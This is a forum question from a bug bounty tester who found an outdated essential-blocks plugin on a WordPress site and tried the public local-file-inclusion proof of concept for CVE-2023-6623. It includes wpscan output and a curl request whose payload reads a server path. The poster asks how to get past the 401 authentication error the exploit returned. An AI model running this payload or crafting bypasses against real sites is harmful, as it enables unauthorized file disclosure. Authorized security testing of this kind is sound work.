14Nis
Navigating CVE-2023-6623: Seeking Assistance in Crafting a WordPress LFI Vulnerability Proof of Concept [closed]
I was testing on a private bug bounty program and found that one of its assets is running WordPress. Upon enumerating its plugins using wpscan, I found a plugin, essential-blocks@4.0.8, which is vulnerable to LFI; see CVE-2023-6623.
However, I am unable to create a PoC for it.
wpscan output:
[+] essential-blocks
| Location: https://foo.bar.com/wp-content/plugins/essential-blocks/
| Last Updated: 2024-04-09T10:50:00.000Z
| [!] The version is out of date, the latest version is 4.5.9
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 4.0.8 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://foo.bar.com/wp-content/plugins/essential-blocks/readme.txt
vp readme.txt (essential-blocks/readme.txt):
== Changelog ==
= 4.0.8 - 18/04/2023
- Fixed: Security update & bugfix
= 4.0.7 - 17/04/2023
- Fixed: **Count Down** block's error in style tab
- Fixed: **Flipbox** block's richtext invalid html tag issue
- Fixed: Assets generation issue
- Fixed: **Advanced Navigation** block's undefined js error ....
I think this confirms it really is running the version essential-blocks@4.0.8.
However, when I try to exploit it with
curl --url 'http://foo.bar.com/wp-json/essential-blocks
/v1/queries?block_type=nonexisting_block&query_data={"source":+"post"}
&attributes={"__file":+"/etc"}'
I get a 401 error:
{"code":"rest_cannot_access",
"message":"DRA: Only authenticated users can access the REST API.",
"data":{"status":401}}
Note: I am URL-encoding it before sending. Also, I am pretty sure it's not blocked by any external WAF and is probably an issue with WordPress. This PoC was uploaded by wpscan itself; see https://wpscan.com/vulnerability/633c28e0-0c9e-4e68-9424-55c32789b41f/
I want to know:
- What does this error mean?
- What further steps can I take to find the proper PoC bypassing this error?
- On a rough estimate, can it be exploited with more leads, or should I report this issue and avoid wasting any time?